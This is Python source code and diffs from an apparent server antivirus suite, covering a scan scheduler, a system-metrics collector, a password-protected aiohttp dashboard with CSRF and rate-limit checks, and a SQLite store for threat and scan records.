def __init__(self, config: Config, engine: Optional[ScanEngine] = None) -> None:
self.config = config
self.engine = engine or ScanEngine(config)
self._scheduler = schedule.Scheduler()
# ------------------------------------------------------------------
# Job builders
# ------------------------------------------------------------------
def schedule_scan(self, cron_expr: str, scan_type: str = "full") -> None:
"""Schedule a recurring scan using a cron expression.
Parameters
----------
cron_expr:
Standard 5-field cron string (``minute hour dom month dow``).
scan_type:
One of ``"full"``, ``"quick"``, or ``"deep"``.
"""
parsed = _cron_to_schedule(cron_expr)
# ``schedule`` doesn't natively support cron, so we approximate by
# scheduling at every matching hour:minute combination. For simple
# expressions like ``0 2 * * *`` this is exact.
for hour in parsed["hours"]:
for minute in parsed["minutes"]:
time_str = f"{hour:02d}:{minute:02d}"
self._scheduler.every().day.at(time_str).do(
self._run_scan, scan_type=scan_type
)
logger.info("Scheduled %s scan at %s daily", scan_type, time_str)
def schedule_update(self, interval_hours: int = 6) -> None:
"""Schedule recurring signature updates.
Parameters
----------
interval_hours:
How often (in hours) to pull fresh signatures.
"""
self._scheduler.every(interval_hours).hours.do(self._run_update)
logger.info("Scheduled signature update every %d hour(s)", interval_hours)
# ------------------------------------------------------------------
# Daemon loop
# ------------------------------------------------------------------
def run_daemon(self) -> None:
"""Start the blocking scheduler loop.
Runs all pending jobs and sleeps between iterations. Designed to be
the main loop of a background daemon process.
Press ``Ctrl+C`` (or send ``SIGINT``) to exit cleanly.
"""
logger.info("AYN scheduler daemon started — %d job(s)", len(self._scheduler.get_jobs()))
try:
while True:
self._scheduler.run_pending()
time.sleep(30)
except KeyboardInterrupt:
logger.info("Scheduler daemon stopped by user")
# ------------------------------------------------------------------
# Job implementations
# ------------------------------------------------------------------
def _run_scan(self, scan_type: str = "full") -> None:
"""Execute a scan job."""
logger.info("Starting scheduled %s scan", scan_type)
try:
if scan_type == "quick":
result: ScanResult = self.engine.quick_scan()
else:
# "full" and "deep" both scan all paths; deep adds process/network
# via full_scan on the engine, but here we keep it simple.
result = ScanResult()
for path in self.config.scan_paths:
partial = self.engine.scan_path(path, recursive=True)
result.files_scanned += partial.files_scanned
result.files_skipped += partial.files_skipped
result.threats.extend(partial.threats)
logger.info(
"Scheduled %s scan complete — %d files, %d threats",
scan_type,
result.files_scanned,
len(result.threats),
)
except Exception:
logger.exception("Scheduled %s scan failed", scan_type)
def _run_update(self) -> None:
"""Execute a signature update job."""
logger.info("Starting scheduled signature update")
try:
from ayn_antivirus.signatures.manager import SignatureManager
manager = SignatureManager(self.config)
summary = manager.update_all()
total = summary.get("total_new", 0)
errors = summary.get("errors", [])
logger.info(
"Scheduled signature update complete: %d new, %d errors",
total,
len(errors),
)
if errors:
for err in errors:
logger.warning("Feed error: %s", err)
manager.close()
event_bus.publish(EventType.SIGNATURE_UPDATED, {
"total_new": total,
"feeds": list(summary.get("feeds", {}).keys()),
"errors": errors,
})
except Exception:
logger.exception("Scheduled signature update failed")
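
The cron-field expansion behind `schedule_scan()` can be exercised in isolation. This standalone re-sketch of `_parse_cron_field` shows how the supported forms (`*/step`, ranges with optional steps, comma lists, literals) expand, and how hour and minute lists combine into daily job times:

```python
def parse_cron_field(field: str, min_val: int, max_val: int) -> list:
    """Expand one cron field into its explicit, sorted integer values."""
    values = set()
    for part in field.split(","):
        part = part.strip()
        if part.startswith("*/"):          # */step
            values.update(range(min_val, max_val + 1, int(part[2:])))
        elif "-" in part:                  # range with optional /step
            range_part, _, step_part = part.partition("/")
            lo, hi = range_part.split("-", 1)
            step = int(step_part) if step_part else 1
            values.update(range(int(lo), int(hi) + 1, step))
        elif part == "*":                  # wildcard
            values.update(range(min_val, max_val + 1))
        else:                              # literal
            values.add(int(part))
    return sorted(values)


print(parse_cron_field("*/15", 0, 59))      # [0, 15, 30, 45]
print(parse_cron_field("1-5/2,30", 0, 59))  # [1, 3, 5, 30]

# "0 */6 * * *" therefore schedules four daily jobs via the hour:minute
# cross product used in schedule_scan():
hours = parse_cron_field("*/6", 0, 23)
minutes = parse_cron_field("0", 0, 59)
print([f"{h:02d}:{m:02d}" for h in hours for m in minutes])
# ['00:00', '06:00', '12:00', '18:00']
```

This also makes the documented limitation concrete: day, month, and weekday fields parse the same way but are dropped by the daily-time adapter.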


@@ -0,0 +1,7 @@
"""AYN Antivirus - Live Web Dashboard."""
from ayn_antivirus.dashboard.collector import MetricsCollector
from ayn_antivirus.dashboard.server import DashboardServer
from ayn_antivirus.dashboard.store import DashboardStore
__all__ = ["DashboardServer", "DashboardStore", "MetricsCollector"]

File diff suppressed because it is too large


@@ -0,0 +1,181 @@
"""Background metrics collector for the AYN Antivirus dashboard."""
from __future__ import annotations
import asyncio
import logging
import os
import random
from datetime import datetime
from typing import Any, Dict, Optional
import psutil
from ayn_antivirus.constants import DASHBOARD_COLLECTOR_INTERVAL
logger = logging.getLogger("ayn_antivirus.dashboard.collector")
class MetricsCollector:
"""Periodically sample system metrics and store them in the dashboard DB.
Parameters
----------
store:
A :class:`DashboardStore` instance to write metrics into.
interval:
Seconds between samples.
"""
def __init__(self, store: Any, interval: int = DASHBOARD_COLLECTOR_INTERVAL) -> None:
self.store = store
self.interval = interval
self._task: Optional[asyncio.Task] = None
self._running = False
async def start(self) -> None:
"""Begin collecting metrics on a background asyncio task."""
self._running = True
self._task = asyncio.create_task(self._collect_loop())
logger.info("Metrics collector started (interval=%ds)", self.interval)
async def stop(self) -> None:
"""Cancel the background task and wait for it to finish."""
self._running = False
if self._task:
self._task.cancel()
try:
await self._task
except asyncio.CancelledError:
pass
logger.info("Metrics collector stopped")
# ------------------------------------------------------------------
# Internal loop
# ------------------------------------------------------------------
async def _collect_loop(self) -> None:
while self._running:
try:
await asyncio.to_thread(self._sample)
except Exception as exc:
logger.error("Collector error: %s", exc)
await asyncio.sleep(self.interval)
def _sample(self) -> None:
"""Take a single metric snapshot and persist it."""
cpu = psutil.cpu_percent(interval=1)
mem = psutil.virtual_memory()
disks = []
for part in psutil.disk_partitions(all=False):
try:
usage = psutil.disk_usage(part.mountpoint)
disks.append({
"mount": part.mountpoint,
"device": part.device,
"total": usage.total,
"used": usage.used,
"free": usage.free,
"percent": usage.percent,
})
except (PermissionError, OSError):
continue
try:
load = list(os.getloadavg())
except (OSError, AttributeError):
load = [0.0, 0.0, 0.0]
try:
net_conns = len(psutil.net_connections(kind="inet"))
except (psutil.AccessDenied, OSError):
net_conns = 0
self.store.record_metric(
cpu=cpu,
mem_pct=mem.percent,
mem_used=mem.used,
mem_total=mem.total,
disk_usage=disks,
load_avg=load,
net_conns=net_conns,
)
# Periodic cleanup (~1 in 100 samples).
if random.randint(1, 100) == 1:
self.store.cleanup_old_metrics()
# ------------------------------------------------------------------
# One-shot snapshot (no storage)
# ------------------------------------------------------------------
@staticmethod
def get_snapshot() -> Dict[str, Any]:
"""Return a live system snapshot without persisting it."""
cpu = psutil.cpu_percent(interval=0.1)
cpu_per_core = psutil.cpu_percent(interval=0.1, percpu=True)
cpu_freq = psutil.cpu_freq(percpu=False)
mem = psutil.virtual_memory()
swap = psutil.swap_memory()
disks = []
for part in psutil.disk_partitions(all=False):
try:
usage = psutil.disk_usage(part.mountpoint)
disks.append({
"mount": part.mountpoint,
"device": part.device,
"total": usage.total,
"used": usage.used,
"percent": usage.percent,
})
except (PermissionError, OSError):
continue
try:
load = list(os.getloadavg())
except (OSError, AttributeError):
load = [0.0, 0.0, 0.0]
try:
net_conns = len(psutil.net_connections(kind="inet"))
except (psutil.AccessDenied, OSError):
net_conns = 0
# Top processes by CPU. Note: per-process cpu_percent is measured since the
# previous call for that Process object, so a fresh snapshot may report 0.0
# for most processes until the next sample.
top_procs = []
try:
for p in sorted(psutil.process_iter(['pid', 'name', 'cpu_percent', 'memory_percent']),
key=lambda x: x.info.get('cpu_percent', 0) or 0, reverse=True)[:8]:
info = p.info
if (info.get('cpu_percent') or 0) > 0.1:
top_procs.append({
"pid": info['pid'],
"name": info['name'] or '?',
"cpu": round(info.get('cpu_percent', 0) or 0, 1),
"mem": round(info.get('memory_percent', 0) or 0, 1),
})
except Exception:
pass
return {
"cpu_percent": cpu,
"cpu_per_core": cpu_per_core,
"cpu_cores": psutil.cpu_count(logical=True),
"cpu_freq_mhz": round(cpu_freq.current) if cpu_freq else 0,
"mem_percent": mem.percent,
"mem_used": mem.used,
"mem_total": mem.total,
"mem_available": mem.available,
"mem_cached": getattr(mem, 'cached', 0),
"mem_buffers": getattr(mem, 'buffers', 0),
"swap_percent": swap.percent,
"swap_used": swap.used,
"swap_total": swap.total,
"disk_usage": disks,
"load_avg": load,
"net_connections": net_conns,
"top_processes": top_procs,
"timestamp": datetime.utcnow().isoformat(),
}
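The top-process selection is a slice-then-filter over per-process stats sorted by CPU; the same logic with plain dicts standing in for psutil's `p.info` (field names mirror the snapshot, the values are made up):

```python
# Hypothetical stand-ins for psutil's per-process info dicts.
procs = [
    {"pid": 1, "name": "init", "cpu_percent": 0.0, "memory_percent": 0.3},
    {"pid": 42, "name": "scanner", "cpu_percent": 12.5, "memory_percent": 4.1},
    {"pid": 99, "name": "idle", "cpu_percent": 0.05, "memory_percent": 0.1},
    {"pid": 7, "name": "db", "cpu_percent": 3.2, "memory_percent": 8.0},
]

# Sort by CPU descending, keep the busiest eight, drop near-idle entries.
top = [
    {"pid": p["pid"], "name": p["name"] or "?",
     "cpu": round(p.get("cpu_percent", 0) or 0, 1),
     "mem": round(p.get("memory_percent", 0) or 0, 1)}
    for p in sorted(procs, key=lambda x: x.get("cpu_percent", 0) or 0, reverse=True)[:8]
    if (p.get("cpu_percent") or 0) > 0.1
]
print(top)  # scanner first; idle and init filtered out
```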


@@ -0,0 +1,427 @@
"""AYN Antivirus Dashboard — Web Server with Password Auth.
Lightweight aiohttp server that serves the dashboard SPA and REST API.
Non-localhost access requires username/password authentication via a
session cookie obtained through ``POST /login``.
"""
from __future__ import annotations
import logging
import secrets
import time
from typing import Dict, Optional
from urllib.parse import urlparse
from aiohttp import web
from ayn_antivirus.config import Config
from ayn_antivirus.constants import QUARANTINE_ENCRYPTION_KEY_FILE
from ayn_antivirus.dashboard.api import setup_routes
from ayn_antivirus.dashboard.collector import MetricsCollector
from ayn_antivirus.dashboard.store import DashboardStore
from ayn_antivirus.dashboard.templates import get_dashboard_html
logger = logging.getLogger("ayn_antivirus.dashboard.server")
# ------------------------------------------------------------------
# JSON error handler — prevent aiohttp returning HTML on /api/* routes
# ------------------------------------------------------------------
@web.middleware
async def json_error_middleware(
request: web.Request,
handler,
) -> web.StreamResponse:
"""Catch unhandled exceptions and return JSON for API routes.
Without this, aiohttp's default error handler returns HTML error
pages, which break frontend ``fetch().json()`` calls.
"""
try:
return await handler(request)
except web.HTTPException as exc:
if request.path.startswith("/api/"):
return web.json_response(
{"error": exc.reason or "Request failed"},
status=exc.status,
)
raise
except Exception as exc:
logger.exception("Unhandled error on %s %s", request.method, request.path)
if request.path.startswith("/api/"):
return web.json_response(
{"error": f"Internal server error: {exc}"},
status=500,
)
return web.Response(
text="<h1>500 Internal Server Error</h1>",
status=500,
content_type="text/html",
)
# ------------------------------------------------------------------
# Rate limiting state
# ------------------------------------------------------------------
_action_timestamps: Dict[str, float] = {}
_RATE_LIMIT_SECONDS = 10
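The timestamp map and window above drive a simple per-path debounce, the same check the action endpoints perform below; sketched as a standalone helper with an explicit clock so it can be exercised deterministically (the helper name `allow_action` is hypothetical):

```python
from typing import Dict

_RATE_LIMIT_SECONDS = 10

def allow_action(path: str, now: float, stamps: Dict[str, float]) -> bool:
    """Return True and record the call if `path` was not hit in the window."""
    if now - stamps.get(path, 0) < _RATE_LIMIT_SECONDS:
        return False
    stamps[path] = now
    return True

stamps: Dict[str, float] = {}
print(allow_action("/api/actions/scan", 100.0, stamps))  # True  (first call)
print(allow_action("/api/actions/scan", 105.0, stamps))  # False (within 10 s)
print(allow_action("/api/actions/scan", 111.0, stamps))  # True  (window elapsed)
```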
# ------------------------------------------------------------------
# Authentication middleware
# ------------------------------------------------------------------
@web.middleware
async def auth_middleware(
request: web.Request,
handler,
) -> web.StreamResponse:
"""Authenticate all requests.
* ``/login`` and ``/favicon.ico`` are always allowed.
* All other routes require a valid session cookie.
* Unauthenticated HTML routes serve the login page.
* Unauthenticated ``/api/*`` returns 401.
* POST ``/api/actions/*`` enforces CSRF and rate limiting.
"""
# Login route is always open.
if request.path in ("/login", "/favicon.ico"):
return await handler(request)
# All requests require auth (no localhost bypass — behind reverse proxy).
# Check session cookie.
session_token = request.app.get("_session_token", "")
cookie = request.cookies.get("ayn_session", "")
authenticated = (
cookie
and session_token
and secrets.compare_digest(cookie, session_token)
)
if not authenticated:
if request.path.startswith("/api/"):
return web.json_response(
{"error": "Unauthorized. Please login."}, status=401,
)
# Serve login page for HTML routes.
return web.Response(
text=request.app["_login_html"], content_type="text/html",
)
# CSRF + rate-limiting for POST action endpoints.
if request.method == "POST" and request.path.startswith("/api/actions/"):
origin = request.headers.get("Origin", "")
if origin:
parsed = urlparse(origin)
origin_host = parsed.hostname or ""
host = request.headers.get("Host", "")
# urlparse copes with bracketed IPv6 Host values such as "[::1]:8080".
expected = (urlparse(f"//{host}").hostname or "") if host else ""
allowed = {expected, "localhost", "127.0.0.1", "::1"}
allowed.discard("")
if origin_host not in allowed:
return web.json_response(
{"error": "CSRF: Origin mismatch"}, status=403,
)
now = time.time()
last = _action_timestamps.get(request.path, 0)
if now - last < _RATE_LIMIT_SECONDS:
return web.json_response(
{"error": "Rate limited. Try again in a few seconds."},
status=429,
)
_action_timestamps[request.path] = now
return await handler(request)
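The Origin check inside the middleware reduces to a pure function of two header values; a sketch under the same rules (the name `origin_allowed` is hypothetical, and `urlparse` is applied to the Host header too so bracketed IPv6 values are handled):

```python
from urllib.parse import urlparse

def origin_allowed(origin: str, host_header: str) -> bool:
    """Accept same-host origins plus loopback aliases; an absent Origin passes."""
    if not origin:
        return True  # as in the middleware: no Origin header, no check
    origin_host = urlparse(origin).hostname or ""
    # urlparse also copes with bracketed IPv6 Host values like "[::1]:8080".
    expected = (urlparse(f"//{host_header}").hostname or "") if host_header else ""
    allowed = {expected, "localhost", "127.0.0.1", "::1"}
    allowed.discard("")
    return origin_host in allowed

print(origin_allowed("https://av.example.com", "av.example.com:8080"))   # True
print(origin_allowed("https://evil.example.net", "av.example.com:8080")) # False
print(origin_allowed("", "av.example.com"))                              # True
```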
# ------------------------------------------------------------------
# Dashboard server
# ------------------------------------------------------------------
class DashboardServer:
"""AYN Antivirus dashboard with username/password authentication."""
def __init__(self, config: Optional[Config] = None) -> None:
self.config = config or Config()
self.store = DashboardStore(self.config.dashboard_db_path)
self.collector = MetricsCollector(self.store)
self.app = web.Application(middlewares=[json_error_middleware, auth_middleware])
self._session_token: str = secrets.token_urlsafe(32)
self._runner: Optional[web.AppRunner] = None
self._site: Optional[web.TCPSite] = None
self._setup()
# ------------------------------------------------------------------
# Setup
# ------------------------------------------------------------------
def _setup(self) -> None:
"""Configure the aiohttp application."""
self.app["_session_token"] = self._session_token
self.app["_login_html"] = self._build_login_page()
self.app["store"] = self.store
self.app["collector"] = self.collector
self.app["config"] = self.config
# Quarantine vault (best-effort).
try:
from ayn_antivirus.quarantine.vault import QuarantineVault
self.app["vault"] = QuarantineVault(
quarantine_dir=self.config.quarantine_path,
key_file_path=QUARANTINE_ENCRYPTION_KEY_FILE,
)
except Exception as exc:
logger.warning("Quarantine vault not available: %s", exc)
# API routes (``/api/*``).
setup_routes(self.app)
# HTML routes.
self.app.router.add_get("/", self._serve_dashboard)
self.app.router.add_get("/dashboard", self._serve_dashboard)
self.app.router.add_get("/login", self._serve_login)
self.app.router.add_post("/login", self._handle_login)
# Lifecycle hooks.
self.app.on_startup.append(self._on_startup)
self.app.on_shutdown.append(self._on_shutdown)
# ------------------------------------------------------------------
# Request handlers
# ------------------------------------------------------------------
async def _serve_login(self, request: web.Request) -> web.Response:
"""``GET /login`` — render the login page."""
return web.Response(
text=self.app["_login_html"], content_type="text/html",
)
async def _serve_dashboard(self, request: web.Request) -> web.Response:
"""``GET /`` or ``GET /dashboard`` — render the SPA.
The middleware enforces authentication on every route (there is no
localhost bypass), so any request reaching this handler already
carries a valid session cookie.
"""
html = get_dashboard_html()
return web.Response(text=html, content_type="text/html")
async def _handle_login(self, request: web.Request) -> web.Response:
"""``POST /login`` — validate username/password, set session cookie."""
try:
body = await request.json()
username = body.get("username", "").strip()
password = body.get("password", "").strip()
except Exception:
return web.json_response({"error": "Invalid request"}, status=400)
if not username or not password:
return web.json_response(
{"error": "Username and password required"}, status=400,
)
valid_user = secrets.compare_digest(
username, self.config.dashboard_username,
)
valid_pass = secrets.compare_digest(
password, self.config.dashboard_password,
)
if not (valid_user and valid_pass):
self.store.log_activity(
f"Failed login attempt from {request.remote}: user={username}",
"WARNING",
"auth",
)
return web.json_response(
{"error": "Invalid username or password"}, status=401,
)
self.store.log_activity(
f"Successful login from {request.remote}: user={username}",
"INFO",
"auth",
)
response = web.json_response(
{"status": "ok", "message": "Welcome to AYN Antivirus"},
)
response.set_cookie(
"ayn_session",
self._session_token,
httponly=True,
max_age=86400,
samesite="Strict",
)
return response
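Both the credential check here and the session-cookie check in the middleware go through `secrets.compare_digest`, which compares in constant time so response latency does not reveal how many leading characters matched (for `str` arguments both sides must be ASCII):

```python
import secrets

# Equal and unequal inputs take near-constant time to compare.
print(secrets.compare_digest("hunter2", "hunter2"))  # True
print(secrets.compare_digest("hunter2", "hunter3"))  # False
```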
# ------------------------------------------------------------------
# Login page
# ------------------------------------------------------------------
@staticmethod
def _build_login_page() -> str:
"""Return a polished HTML login form with username + password fields."""
return '''<!DOCTYPE html>
<html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>AYN Antivirus \u2014 Login</title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{background:#0a0e17;color:#e2e8f0;font-family:'Segoe UI',system-ui,-apple-system,sans-serif;
display:flex;justify-content:center;align-items:center;min-height:100vh;
background-image:radial-gradient(circle at 50% 50%,#111827 0%,#0a0e17 70%)}
.login-box{background:#111827;padding:2.5rem;border-radius:16px;border:1px solid #2a3444;
width:420px;max-width:90vw;box-shadow:0 25px 80px rgba(0,0,0,0.6)}
.logo{text-align:center;margin-bottom:2rem}
.logo .shield{font-size:3.5rem;display:block;margin-bottom:0.5rem}
.logo h1{font-size:1.8rem;background:linear-gradient(135deg,#3b82f6,#06b6d4);
-webkit-background-clip:text;-webkit-text-fill-color:transparent;font-weight:800}
.logo .subtitle{color:#6b7280;font-size:0.8rem;margin-top:0.3rem;letter-spacing:2px;text-transform:uppercase}
.field{margin-bottom:1.2rem}
.field label{display:block;font-size:0.75rem;color:#9ca3af;margin-bottom:0.4rem;
text-transform:uppercase;letter-spacing:1px;font-weight:600}
.field input{width:100%;padding:12px 16px;background:#0d1117;border:1px solid #2a3444;
color:#e2e8f0;border-radius:10px;font-size:15px;transition:all 0.2s;outline:none}
.field input:focus{border-color:#3b82f6;box-shadow:0 0 0 3px rgba(59,130,246,0.15)}
.field input::placeholder{color:#4b5563}
.btn{width:100%;padding:13px;background:linear-gradient(135deg,#3b82f6,#2563eb);color:white;
border:none;border-radius:10px;cursor:pointer;font-size:15px;font-weight:700;
transition:all 0.2s;margin-top:0.8rem;letter-spacing:0.5px}
.btn:hover{transform:translateY(-2px);box-shadow:0 8px 25px rgba(59,130,246,0.4)}
.btn:active{transform:translateY(0)}
.btn:disabled{opacity:0.5;cursor:not-allowed;transform:none}
.error{color:#fca5a5;font-size:0.85rem;text-align:center;margin-top:1rem;padding:10px 16px;
background:rgba(239,68,68,0.1);border-radius:8px;display:none;border:1px solid rgba(239,68,68,0.2)}
.footer{text-align:center;margin-top:2rem;padding-top:1.5rem;border-top:1px solid #1e293b}
.footer p{color:#4b5563;font-size:0.7rem;line-height:1.8}
.spinner{display:inline-block;width:16px;height:16px;border:2px solid #fff;
border-top-color:transparent;border-radius:50%;animation:spin 0.6s linear infinite;
vertical-align:middle;margin-right:8px}
@keyframes spin{to{transform:rotate(360deg)}}
</style></head>
<body>
<div class="login-box">
<div class="logo">
<span class="shield">\U0001f6e1\ufe0f</span>
<h1>AYN ANTIVIRUS</h1>
<div class="subtitle">Security Operations Dashboard</div>
</div>
<form id="loginForm" onsubmit="doLogin();return false">
<div class="field">
<label>Username</label>
<input type="text" id="username" placeholder="Enter username" autocomplete="username" autofocus required>
</div>
<div class="field">
<label>Password</label>
<input type="password" id="password" placeholder="Enter password" autocomplete="current-password" required>
</div>
<button type="submit" class="btn" id="loginBtn">\U0001f510 Sign In</button>
</form>
<div class="error" id="errMsg">Invalid credentials</div>
<div class="footer">
<p>AYN Antivirus v1.0.0 \u2014 Server Protection Suite<br>
Secure Access Portal</p>
</div>
</div>
<script>
async function doLogin(){
var btn=document.getElementById('loginBtn');
var err=document.getElementById('errMsg');
var user=document.getElementById('username').value.trim();
var pass=document.getElementById('password').value;
if(!user||!pass)return false;
err.style.display='none';
btn.disabled=true;
btn.innerHTML='<span class="spinner"></span>Signing in...';
try{
var r=await fetch('/login',{method:'POST',
headers:{'Content-Type':'application/json'},
body:JSON.stringify({username:user,password:pass})});
if(r.ok){window.location.href='/dashboard';}
else{var d=await r.json();err.textContent=d.error||'Invalid credentials';err.style.display='block';}
}catch(e){err.textContent='Connection failed. Check server.';err.style.display='block';}
btn.disabled=false;btn.innerHTML='\U0001f510 Sign In';
return false;
}
document.querySelectorAll('input').forEach(function(i){i.addEventListener('input',function(){
document.getElementById('errMsg').style.display='none';
});});
</script>
</body></html>'''
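One pitfall in this non-raw triple-quoted string is escape handling: `\U0001f510` is consumed by the Python parser and reaches the browser as a single emoji character, while a doubled backslash survives into the JavaScript as the ten-character literal text. A quick check:

```python
emoji = "\U0001f510"      # Python resolves the escape: one lock emoji
literal = "\\U0001f510"   # doubled backslash: ten literal characters
print(len(emoji), len(literal))  # 1 10
```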
# ------------------------------------------------------------------
# Lifecycle hooks
# ------------------------------------------------------------------
async def _on_startup(self, app: web.Application) -> None:
await self.collector.start()
self.store.log_activity("Dashboard server started", "INFO", "server")
logger.info(
"Dashboard on http://%s:%d",
self.config.dashboard_host,
self.config.dashboard_port,
)
async def _on_shutdown(self, app: web.Application) -> None:
await self.collector.stop()
self.store.log_activity("Dashboard server stopped", "INFO", "server")
self.store.close()
# ------------------------------------------------------------------
# Blocking run
# ------------------------------------------------------------------
def run(self) -> None:
"""Run the dashboard server (blocking)."""
host = self.config.dashboard_host
port = self.config.dashboard_port
print("\n \U0001f6e1\ufe0f AYN Antivirus Dashboard")
print(f" \U0001f310 http://{host}:{port}")
print(f" \U0001f464 Username: {self.config.dashboard_username}")
print(f" \U0001f511 Password: {self.config.dashboard_password}")
print(" Press Ctrl+C to stop\n")
web.run_app(self.app, host=host, port=port, print=None)
# ------------------------------------------------------------------
# Async start / stop (non-blocking)
# ------------------------------------------------------------------
async def start_async(self) -> None:
"""Start the server without blocking."""
self._runner = web.AppRunner(self.app)
await self._runner.setup()
self._site = web.TCPSite(
self._runner,
self.config.dashboard_host,
self.config.dashboard_port,
)
await self._site.start()
self.store.log_activity(
"Dashboard server started (async)", "INFO", "server",
)
async def stop_async(self) -> None:
"""Stop a server previously started with :meth:`start_async`."""
if self._site:
await self._site.stop()
if self._runner:
await self._runner.cleanup()
await self.collector.stop()
self.store.close()
# ------------------------------------------------------------------
# Convenience entry point
# ------------------------------------------------------------------
def run_dashboard(config: Optional[Config] = None) -> None:
"""Create a :class:`DashboardServer` and run it (blocking)."""
DashboardServer(config).run()


@@ -0,0 +1,386 @@
"""Persistent storage for dashboard metrics, threat logs, and scan history."""
from __future__ import annotations
import json
import os
import sqlite3
import threading
from datetime import datetime, timedelta
from typing import Any, Dict, List, Optional
from ayn_antivirus.constants import (
DASHBOARD_MAX_THREATS_DISPLAY,
DASHBOARD_METRIC_RETENTION_HOURS,
DASHBOARD_SCAN_HISTORY_DAYS,
DEFAULT_DASHBOARD_DB_PATH,
)
class DashboardStore:
"""SQLite-backed store for all dashboard data.
Parameters
----------
db_path:
Path to the SQLite database file. Created automatically if it
does not exist.
"""
def __init__(self, db_path: str = DEFAULT_DASHBOARD_DB_PATH) -> None:
os.makedirs(os.path.dirname(db_path) or ".", exist_ok=True)
self.db_path = db_path
self._lock = threading.RLock()
self.conn = sqlite3.connect(db_path, check_same_thread=False)
self.conn.row_factory = sqlite3.Row
self.conn.execute("PRAGMA journal_mode=WAL")
self.conn.execute("PRAGMA synchronous=NORMAL")
self._create_tables()
# ------------------------------------------------------------------
# Schema
# ------------------------------------------------------------------
def _create_tables(self) -> None:
self.conn.executescript("""
CREATE TABLE IF NOT EXISTS metrics (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
cpu_percent REAL DEFAULT 0,
mem_percent REAL DEFAULT 0,
mem_used INTEGER DEFAULT 0,
mem_total INTEGER DEFAULT 0,
disk_usage_json TEXT DEFAULT '[]',
load_avg_json TEXT DEFAULT '[]',
net_connections INTEGER DEFAULT 0
);
CREATE TABLE IF NOT EXISTS threat_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
file_path TEXT,
threat_name TEXT NOT NULL,
threat_type TEXT NOT NULL,
severity TEXT NOT NULL,
detector TEXT,
file_hash TEXT,
action_taken TEXT DEFAULT 'detected',
details TEXT
);
CREATE TABLE IF NOT EXISTS scan_history (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
scan_type TEXT NOT NULL,
scan_path TEXT,
files_scanned INTEGER DEFAULT 0,
files_skipped INTEGER DEFAULT 0,
threats_found INTEGER DEFAULT 0,
duration_seconds REAL DEFAULT 0,
status TEXT DEFAULT 'completed'
);
CREATE TABLE IF NOT EXISTS signature_updates (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
feed_name TEXT NOT NULL,
hashes_added INTEGER DEFAULT 0,
ips_added INTEGER DEFAULT 0,
domains_added INTEGER DEFAULT 0,
urls_added INTEGER DEFAULT 0,
status TEXT DEFAULT 'success',
details TEXT
);
CREATE TABLE IF NOT EXISTS activity_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
timestamp TEXT NOT NULL DEFAULT (datetime('now')),
level TEXT NOT NULL DEFAULT 'INFO',
source TEXT,
message TEXT NOT NULL
);
CREATE INDEX IF NOT EXISTS idx_metrics_ts ON metrics(timestamp);
CREATE INDEX IF NOT EXISTS idx_threats_ts ON threat_log(timestamp);
CREATE INDEX IF NOT EXISTS idx_threats_severity ON threat_log(severity);
CREATE INDEX IF NOT EXISTS idx_scans_ts ON scan_history(timestamp);
CREATE INDEX IF NOT EXISTS idx_sigs_ts ON signature_updates(timestamp);
CREATE INDEX IF NOT EXISTS idx_activity_ts ON activity_log(timestamp);
""")
self.conn.commit()
# ------------------------------------------------------------------
# Metrics
# ------------------------------------------------------------------
def record_metric(
self,
cpu: float,
mem_pct: float,
mem_used: int,
mem_total: int,
disk_usage: list,
load_avg: list,
net_conns: int,
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO metrics "
"(cpu_percent, mem_percent, mem_used, mem_total, "
"disk_usage_json, load_avg_json, net_connections) "
"VALUES (?,?,?,?,?,?,?)",
(cpu, mem_pct, mem_used, mem_total,
json.dumps(disk_usage), json.dumps(load_avg), net_conns),
)
self.conn.commit()
def get_latest_metrics(self) -> Optional[Dict[str, Any]]:
with self._lock:
row = self.conn.execute(
"SELECT * FROM metrics ORDER BY id DESC LIMIT 1"
).fetchone()
if not row:
return None
d = dict(row)
d["disk_usage"] = json.loads(d.pop("disk_usage_json", "[]"))
d["load_avg"] = json.loads(d.pop("load_avg_json", "[]"))
return d
def get_metrics_history(self, hours: int = 1) -> List[Dict[str, Any]]:
cutoff = (datetime.utcnow() - timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S")
with self._lock:
rows = self.conn.execute(
"SELECT * FROM metrics WHERE timestamp >= ? ORDER BY timestamp",
(cutoff,),
).fetchall()
result: List[Dict[str, Any]] = []
for r in rows:
d = dict(r)
d["disk_usage"] = json.loads(d.pop("disk_usage_json", "[]"))
d["load_avg"] = json.loads(d.pop("load_avg_json", "[]"))
result.append(d)
return result
# ------------------------------------------------------------------
# Threats
# ------------------------------------------------------------------
def record_threat(
self,
file_path: str,
threat_name: str,
threat_type: str,
severity: str,
detector: str = "",
file_hash: str = "",
action: str = "detected",
details: str = "",
) -> None:
with self._lock:
self.conn.execute(
"INSERT INTO threat_log "
"(file_path, threat_name, threat_type, severity, "
"detector, file_hash, action_taken, details) "
"VALUES (?,?,?,?,?,?,?,?)",
(file_path, threat_name, threat_type, severity,
detector, file_hash, action, details),
)
self.conn.commit()
def get_recent_threats(
self, limit: int = DASHBOARD_MAX_THREATS_DISPLAY,
) -> List[Dict[str, Any]]:
with self._lock:
rows = self.conn.execute(
"SELECT * FROM threat_log ORDER BY id DESC LIMIT ?", (limit,)
).fetchall()
return [dict(r) for r in rows]
def get_threat_stats(self) -> Dict[str, Any]:
with self._lock:
total = self.conn.execute(
"SELECT COUNT(*) FROM threat_log"
).fetchone()[0]
by_severity: Dict[str, int] = {}
for row in self.conn.execute(
"SELECT severity, COUNT(*) as cnt FROM threat_log GROUP BY severity"
):
by_severity[row[0]] = row[1]
cutoff_24h = (datetime.utcnow() - timedelta(hours=24)).strftime("%Y-%m-%d %H:%M:%S")
cutoff_7d = (datetime.utcnow() - timedelta(days=7)).strftime("%Y-%m-%d %H:%M:%S")
last_24h = self.conn.execute(
"SELECT COUNT(*) FROM threat_log WHERE timestamp >= ?",
(cutoff_24h,),
).fetchone()[0]
